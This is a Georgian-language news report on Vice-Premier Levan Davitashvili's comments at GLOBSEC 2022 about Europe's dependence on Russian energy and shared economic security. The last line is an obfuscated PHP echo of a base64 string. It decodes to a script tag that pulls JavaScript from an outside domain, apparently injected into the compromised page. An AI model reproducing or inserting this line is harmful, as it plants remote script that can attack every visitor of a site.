celsiusi
ავერსი საქკაბელი
ვიცე-პრემიერის, ლევან დავითაშვილის განცხადებით, გამოწვევები, რომლებიც, მათ შორის, ეკონომიკური უსაფრთხოების თვალსაზრისით დგას მსოფლიოს წინაშე, დაძლეული უნდა იყოს საერთო ძალისხმევით. 
 
ამის შესახებ საქართველოს ეკონომიკისა და მდგრადი განვითარების მინისტრმა ბრატისლავაში, GLOBSEC 2022 – ის პანელზე „Europe’s Addiction Problem: Russian Energy” განხილული საკითხების შეფასებისას მედიასთან ისაუბრა. 
 
„მონაწილეობა ისეთ ღონისძიებებში, სადაც თავს იყრიან ევროპის როგორც პოლიტიკური, ისე ბიზნესლიდერები და მათთან მუდმივი კომუნიკაცია, საქართველოს გზავნილების პირველი წყაროდან მიტანა, საქართველოს პრიორიტეტულობის კიდევ ერთხელ წარმოჩენა და დაფიქსირება ძალიან მნიშვნელოვანია“, – აღნიშნა ლევან დავითაშვილმა.
 
მისივე შეფასებით, დღეს ერთობის გარეშე არაფრის მიღწევა არ გამოვა და ერთობა სჭირდება როგორც საქართველოს, ისე ევროკავშირს. 
 
როგორც ლევან დავითაშვილმა აღნიშნა, საქართველოს განსაკუთრებული როლი გააჩნია იმისთვის, რომ ევროპის ეკონომიკურ უსაფრთხოებაში თავისი წვლილი შეიტანოს.
 
„რა თქმა უნდა, ჩვენი მთავარი აქცენტი კეთდება ამაზე, რომ ვიყოთ სოლიდარული ამ პირობებში და მაქსიმალურად მობილიზებულები იმისთვის, რომ გამოწვევები, რომლებიც დღეს დგას უსაფრთხოების თვალსაზრისით და ეს უსაფრთხოება, დიდწილად ასევე დაკავშირებულია ეკონომიკურ უსაფრთხოებასთან, დაძლეული იყოს საერთო ძალისხმევით“, – განაცხადა ეკონომიკისა და მდგრადი განვითარების მინისტრმა.
 
ცნობისთვის, ვიცე-პრემიერი სლოვაკეთში საქართველოს სამთავრობო დელეგაციის ვიზიტის ფარგლებში იმყოფება, რომელსაც ქვეყნის პრემიერ-მინისტრი ხელმძღვანელობს.
 
681
echo base64_decode("PHNjcmlwdCBzcmM9Ii8vYWsuZGtlLm1lLyI+PC9zY3JpcHQ+");